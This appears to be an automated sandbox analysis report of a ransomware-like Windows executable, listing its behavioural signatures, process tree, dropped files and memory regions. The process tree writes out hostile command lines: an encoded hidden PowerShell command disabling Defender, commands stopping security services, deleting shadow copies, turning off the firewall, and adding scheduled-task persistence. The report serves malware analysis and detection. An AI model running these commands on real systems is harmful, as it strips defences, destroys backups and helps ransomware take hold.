Analysis

  • max time kernel
    150s
  • max time network
    144s
  • platform
    windows11-ltsc_2024_x64
  • resource
    win11ltsc2024-20260709-en
  • resource tags

    arch:x64arch:x86image:win11ltsc2024-20260709-enlocale:en-usos:windows11-ltsc_2024-x64systemwindows
  • submitted
    12/08/2026, 03:47

General

  • Target
    2026-08-12_19c9bbea037ed9df601463850ec87f74_destroyer_elex_glassworm_ngrbot_wannacry.exe
  • Size 49KB
  • Sample260812-eb8lpavvbx
  • SHA256 c656a579e81029f67d77ec7d1ab660c85a427b4949481f48d233c660ee39a09b
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Detects command variations typically used by ransomware 1 IoCs
  • Detects executables embedding registry key / value combination indicative of disabling Windows Defen 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Disables RegEdit via registry modification 1 IoCs
  • Disables Task Manager via registry modification
  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Creates a file in the Startup directory 1 TTPs 64 IoCs

    A file was written to a Windows startup folder. Files in these directories are executed automatically when a user logs on or an application initializes.

  • Disables service(s) 3 TTPs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Stops running service(s) 4 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Discovers running processes 1 TTPs 1 IoCs

    Running process information can be used to identify security tools or plan follow-on actions.

  • Drops file in System32 directory 4 IoCs
  • Executes a VBScript file via the Windows Script Host. 1 TTPs 2 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Executes a command shell one-liner 1 TTPs 7 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Interacts with shadow copies 3 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Control Panel 1 IoCs
  • Modifies data under HKEY_USERS 4 IoCs
  • Modifies registry class 16 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2026-08-12_19c9bbea037ed9df601463850ec87f74_destroyer_elex_glassworm_ngrbot_wannacry.exe
    "C:\Users\Admin\AppData\Local\Temp\2026-08-12_19c9bbea037ed9df601463850ec87f74_destroyer_elex_glassworm_ngrbot_wannacry.exe"
    1⤵
    • Modifies Windows Defender DisableAntiSpyware settings
    • Disables RegEdit via registry modification
    • Drops file in Drivers directory
    • Creates a file in the Startup directory
    • Adds Run key to start application
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1892
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden -Exec Bypass -Enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQA7ACAAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBCAGUAaABhAHYAaQBvAHIATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQA=
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5060
    • C:\Windows\System32\sc.exe
      "C:\Windows\System32\sc.exe" stop wscsvc
      2⤵
      • Launches sc.exe
      PID:364
    • C:\Windows\System32\sc.exe
      "C:\Windows\System32\sc.exe" config wscsvc start= disabled
      2⤵
      • Launches sc.exe
      PID:2080
    • C:\Windows\System32\sc.exe
      "C:\Windows\System32\sc.exe" stop SecurityHealthService
      2⤵
      • Launches sc.exe
      PID:1872
    • C:\Windows\System32\sc.exe
      "C:\Windows\System32\sc.exe" config SecurityHealthService start= disabled
      2⤵
      • Launches sc.exe
      PID:1012
    • C:\Windows\System32\sc.exe
      "C:\Windows\System32\sc.exe" stop WinDefend
      2⤵
      • Launches sc.exe
      PID:4612
    • C:\Windows\System32\sc.exe
      "C:\Windows\System32\sc.exe" config WinDefend start= disabled
      2⤵
      • Launches sc.exe
      PID:3784
    • C:\Windows\System32\sc.exe
      "C:\Windows\System32\sc.exe" stop MsMpSvc
      2⤵
      • Launches sc.exe
      PID:1988
    • C:\Windows\System32\sc.exe
      "C:\Windows\System32\sc.exe" config MsMpSvc start= disabled
      2⤵
      • Launches sc.exe
      PID:5544
    • C:\Windows\System32\fodhelper.exe
      "C:\Windows\System32\fodhelper.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:5836
      • C:\Users\Admin\AppData\Local\Temp\2026-08-12_19c9bbea037ed9df601463850ec87f74_destroyer_elex_glassworm_ngrbot_wannacry.exe
        "C:\Users\Admin\AppData\Local\Temp\2026-08-12_19c9bbea037ed9df601463850ec87f74_destroyer_elex_glassworm_ngrbot_wannacry.exe"
        3⤵
          PID:4244
      • C:\Windows\System32\wscript.exe
        "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\makelnk.vbs
        2⤵
        • Executes a VBScript file via the Windows Script Host.
        PID:5440
      • C:\Windows\SYSTEM32\schtasks.exe
        "schtasks" /create /tn "SysUpdateTask" /tr "C:\Users\Admin\AppData\Local\Temp\2026-08-12_19c9bbea037ed9df601463850ec87f74_destroyer_elex_glassworm_ngrbot_wannacry.exe" /sc onlogon /f
        2⤵
        • Scheduled Task/Job: Scheduled Task
        PID:716
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\del.bat" "
        2⤵
        • Executes a command shell one-liner
        • Suspicious use of WriteProcessMemory
        PID:5968
        • C:\Windows\system32\vssadmin.exe
          vssadmin delete shadows /all /quiet
          3⤵
          • Interacts with shadow copies
          PID:924
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic shadowcopy delete
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:5152
      • C:\Windows\System32\notepad.exe
        "C:\Windows\System32\notepad.exe"
        2⤵
          PID:5560
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd.exe" /c systeminfo > "C:\ProgramData\SysUpdate\Logs\sysinfo.txt"
          2⤵
          • Executes a command shell one-liner
          • Suspicious use of WriteProcessMemory
          PID:2420
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            3⤵
            • Gathers system information
            PID:3280
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd.exe" /c tasklist > "C:\ProgramData\SysUpdate\Logs\tasklist.txt"
          2⤵
          • Executes a command shell one-liner
          • Suspicious use of WriteProcessMemory
          PID:5456
          • C:\Windows\system32\tasklist.exe
            tasklist
            3⤵
            • Discovers running processes
            • Suspicious use of AdjustPrivilegeToken
            PID:1732
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd.exe" /c whoami > "C:\ProgramData\SysUpdate\Logs\whoami.txt"
          2⤵
          • Executes a command shell one-liner
          • Suspicious use of WriteProcessMemory
          PID:5724
          • C:\Windows\system32\whoami.exe
            whoami
            3⤵
              PID:4564
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /c net user > "C:\ProgramData\SysUpdate\Logs\netuser.txt"
            2⤵
            • Executes a command shell one-liner
            • Suspicious use of WriteProcessMemory
            PID:2524
            • C:\Windows\system32\net.exe
              net user
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:5300
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 user
                4⤵
                  PID:1904
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd.exe" /c ipconfig /all > "C:\ProgramData\SysUpdate\Logs\ipconfig.txt"
              2⤵
              • Executes a command shell one-liner
              • Suspicious use of WriteProcessMemory
              PID:5028
              • C:\Windows\system32\ipconfig.exe
                ipconfig /all
                3⤵
                • Gathers network information
                PID:3444
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd.exe" /c netstat -an > "C:\ProgramData\SysUpdate\Logs\netstat.txt"
              2⤵
              • Executes a command shell one-liner
              • Suspicious use of WriteProcessMemory
              PID:2700
              • C:\Windows\system32\NETSTAT.EXE
                netstat -an
                3⤵
                • Gathers network information
                PID:2404
            • C:\Windows\SYSTEM32\schtasks.exe
              "schtasks" /create /tn "RansomwareCheck" /tr "C:\Users\Admin\AppData\Local\Temp\2026-08-12_19c9bbea037ed9df601463850ec87f74_destroyer_elex_glassworm_ngrbot_wannacry.exe" /sc daily /f
              2⤵
              • Scheduled Task/Job: Scheduled Task
              PID:2360
            • C:\Windows\System32\wscript.exe
              "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\createshortcut.vbs
              2⤵
              • Executes a VBScript file via the Windows Script Host.
              PID:2592
            • C:\Windows\System32\vssadmin.exe
              "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
              2⤵
              • Interacts with shadow copies
              PID:4640
            • C:\Windows\System32\wbem\WMIC.exe
              "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete
              2⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1620
            • C:\Windows\System32\net.exe
              "C:\Windows\System32\net.exe" stop srservice
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1704
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 stop srservice
                3⤵
                  PID:696
              • C:\Windows\System32\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall set allprofiles state off
                2⤵
                • Modifies Windows Firewall
                • Event Triggered Execution: Netsh Helper DLL
                PID:5656
              • C:\Windows\System32\sc.exe
                "C:\Windows\System32\sc.exe" config i8042prt start= disabled
                2⤵
                • Launches sc.exe
                PID:3476
              • C:\Windows\System32\sc.exe
                "C:\Windows\System32\sc.exe" stop i8042prt
                2⤵
                • Launches sc.exe
                PID:4632
            • C:\Windows\system32\LogonUI.exe
              "LogonUI.exe" /flags:0x0 /state0:0xa3a23055 /state1:0x41c64e6d
              1⤵
              • Drops file in System32 directory
              • Drops file in Windows directory
              • Checks processor information in registry
              • Modifies data under HKEY_USERS
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:4940
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k CameraMonitor
              1⤵
                PID:3880
              • C:\Windows\system32\wbem\wmiprvse.exe
                C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                1⤵
                  PID:1012
                  • C:\Users\Admin\AppData\Local\Temp\2026-08-12_19c9bbea037ed9df601463850ec87f74_destroyer_elex_glassworm_ngrbot_wannacry.exe
                    C:\Users\Admin\AppData\Local\Temp\2026-08-12_19c9bbea037ed9df601463850ec87f74_destroyer_elex_glassworm_ngrbot_wannacry.exe
                    2⤵
                      PID:5824
                  • C:\Users\Admin\AppData\Local\Temp\2026-08-12_19c9bbea037ed9df601463850ec87f74_destroyer_elex_glassworm_ngrbot_wannacry.exe
                    C:\Users\Admin\AppData\Local\Temp\2026-08-12_19c9bbea037ed9df601463850ec87f74_destroyer_elex_glassworm_ngrbot_wannacry.exe
                    1⤵
                      PID:2012
                    • C:\Windows\system32\vssvc.exe
                      C:\Windows\system32\vssvc.exe
                      1⤵
                        PID:816

                      Network

                            MITRE ATT&CK Enterprise v16

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            invoice_1.pdf

                            • Path C:\ProgramData\invoice_1.pdf
                            • Size 66KB
                            • SHA256 b9bfbe0e356c7a2c0c4778c32224016aa8fe5946426a4f29173a386e3e212df6
                            • MD5 SHA1 SHA512 SSDEEP TLSH

                            doc_3.pdf

                            • Path C:\SystemVolumeInformation\doc_3.pdf
                            • Size 66KB
                            • SHA256 adb0a4c0873b226af3251e12b349c60afc0a09633464b6449f54192bb1453543
                            • MD5 SHA1 SHA512 SSDEEP TLSH

                            createshortcut.vbs

                            • Path C:\Users\Admin\AppData\Local\Temp\createshortcut.vbs
                            • Size 309B
                            • SHA256 0d266605bbf74005be05db52a2d4d888f63e96f7047819eb4fadfecad4d17d58
                            • MD5 SHA1 SHA512 TLSH

                            del.bat

                            • Path C:\Users\Admin\AppData\Local\Temp\del.bat
                            • Size 59B
                            • SHA256 a51f2a0f053ac35b4158bb02b75421ab3698e1d0ee4f926abf1bae3af1570c53
                            • MD5 SHA1 SHA512 TLSH

                            makelnk.vbs

                            • Path C:\Users\Admin\AppData\Local\Temp\makelnk.vbs
                            • Size 310B
                            • SHA256 74b9b396aa4efcd51a35f2f65a4b5b2c68e1ae51f3cda7b3bc00067d13258b68
                            • MD5 SHA1 SHA512 TLSH

                            memory/1892-2255-0x00007FFA512E0000-0x00007FFA51C84000-memory.dmp

                            memory/1892-3-0x00007FFA512E0000-0x00007FFA51C84000-memory.dmp

                            memory/1892-9-0x000000001EDD0000-0x000000001F2F8000-memory.dmp

                            memory/1892-10-0x00007FFA512E0000-0x00007FFA51C84000-memory.dmp

                            memory/1892-11-0x00007FFA512E0000-0x00007FFA51C84000-memory.dmp

                            memory/1892-12-0x00007FFA512E0000-0x00007FFA51C84000-memory.dmp

                            memory/1892-13-0x00007FFA512E0000-0x00007FFA51C84000-memory.dmp

                            memory/1892-14-0x00007FFA512E0000-0x00007FFA51C84000-memory.dmp

                            memory/1892-15-0x00007FFA512E0000-0x00007FFA51C84000-memory.dmp

                            memory/1892-8-0x000000001E1E0000-0x000000001E3A2000-memory.dmp

                            memory/1892-2263-0x00007FFA512E0000-0x00007FFA51C84000-memory.dmp

                            memory/1892-2260-0x00007FFA512E0000-0x00007FFA51C84000-memory.dmp

                            memory/1892-2259-0x00007FFA512E0000-0x00007FFA51C84000-memory.dmp

                            memory/1892-2261-0x00007FFA512E0000-0x00007FFA51C84000-memory.dmp

                            memory/1892-6-0x00007FFA512E0000-0x00007FFA51C84000-memory.dmp

                            memory/1892-7-0x00007FFA512E0000-0x00007FFA51C84000-memory.dmp

                            memory/1892-2-0x00007FFA512E0000-0x00007FFA51C84000-memory.dmp

                            memory/1892-2258-0x00007FFA512E0000-0x00007FFA51C84000-memory.dmp

                            memory/1892-2243-0x000000001C910000-0x000000001C927000-memory.dmp

                            memory/1892-1-0x0000000000C40000-0x0000000000C52000-memory.dmp

                            memory/1892-2257-0x00007FFA512E0000-0x00007FFA51C84000-memory.dmp

                            memory/1892-2250-0x00007FFA512E0000-0x00007FFA51C84000-memory.dmp

                            memory/1892-0-0x00007FFA5146F000-0x00007FFA51470000-memory.dmp

                            memory/1892-2252-0x00007FFA512E0000-0x00007FFA51C84000-memory.dmp

                            memory/1892-2256-0x00007FFA512E0000-0x00007FFA51C84000-memory.dmp

                            memory/5060-2249-0x0000019C73130000-0x0000019C73147000-memory.dmp

                            memory/5060-1840-0x0000019C73270000-0x0000019C7327A000-memory.dmp

                            memory/5060-1195-0x0000019C73290000-0x0000019C73342000-memory.dmp

                            memory/5060-1164-0x0000019C73110000-0x0000019C7312E000-memory.dmp

                            memory/5060-18-0x0000019C73070000-0x0000019C73092000-memory.dmp

                            memory/5060-2266-0x0000019C73130000-0x0000019C73147000-memory.dmp

                            memory/5560-2242-0x000001CFCB630000-0x000001CFCB631000-memory.dmp